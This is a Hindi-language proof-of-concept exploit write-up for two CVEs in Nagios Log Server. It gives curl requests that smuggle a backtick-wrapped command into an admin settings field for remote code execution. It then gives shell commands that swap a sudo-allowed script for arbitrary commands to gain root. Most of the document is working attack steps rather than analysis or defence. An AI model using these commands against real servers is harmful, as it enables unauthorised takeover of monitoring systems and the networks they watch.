
CVE-2025-34322 और CVE-2025-34323 के लिए Nagios Log Server में प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट्स
CVE-2025-34322 और CVE-2025-34323 के लिए Nagios Log Server में प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, साथ ही रूट के रूप में शेल प्राप्त करने के लिए एक संयुक्त स्क्रिप्ट।
प्रमाणीकरण के बाद, अपने सत्र आईडी को इन दो curl कमांड में बदलें। पहला कमांड निष्पादित करने के लिए कमांड सेट करता है, दूसरा कमांड निष्पादित करेगा:
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query
www-data उपयोगकर्ता के पास root के रूप में निम्नलिखित स्क्रिप्ट चलाने के लिए अधिकार हैं:
sudo(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh
और /usr/local/nagioslogserver/scripts निर्देशिका लिखने योग्य है
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios 4.0K Sep 7 16:34 .
drwxr-xr-x 12 root root 4.0K Sep 7 16:29 ..
drwxrwxr-x 4 nagios nagios 4.0K Sep 7 16:20 etc
-rw-r--r-- 1 root root 0 Sep 7 16:34 .installed
drwxr-xr-x 14 nagios nagios 4.0K Sep 7 16:29 logstash
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:20 mibs
drwxr-xr-x 12 nagios nagios 4.0K Sep 7 16:20 opensearch
drwxrwxr-x 5 nagios nagios 4.0K Sep 7 16:20 pythonvenv
drwxrwxr-x 3 nagios nagios 4.0K Sep 7 16:20 scripts
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:36 snapshots
drwxrwxr-x 3 nagios www-data 4.0K Sep 7 16:36 tmp
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:31 var
क्योंकि www-data उपयोगकर्ता nagios समूह का सदस्य है। इसलिए, www-data उपयोगकर्ता स्वामित्व की परवाह किए बिना निर्देशिका के भीतर किसी भी फ़ाइल को स्थानांतरित कर सकता है। निम्नलिखित कमांड एक फ़ाइल (reconfigure_ncpa.sh) को स्थानांतरित करेंगे जिसे www-data उपयोगकर्ता sudo अधिकारों के साथ निष्पादित कर सकता है, और फिर फ़ाइल को एक नई फ़ाइल से बदल देगा जिसमें मनमाने कमांड होंगे:
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;